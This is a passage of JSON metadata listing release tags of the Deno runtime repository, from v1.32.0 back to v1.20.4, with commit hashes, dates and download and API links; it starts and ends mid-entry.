leases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@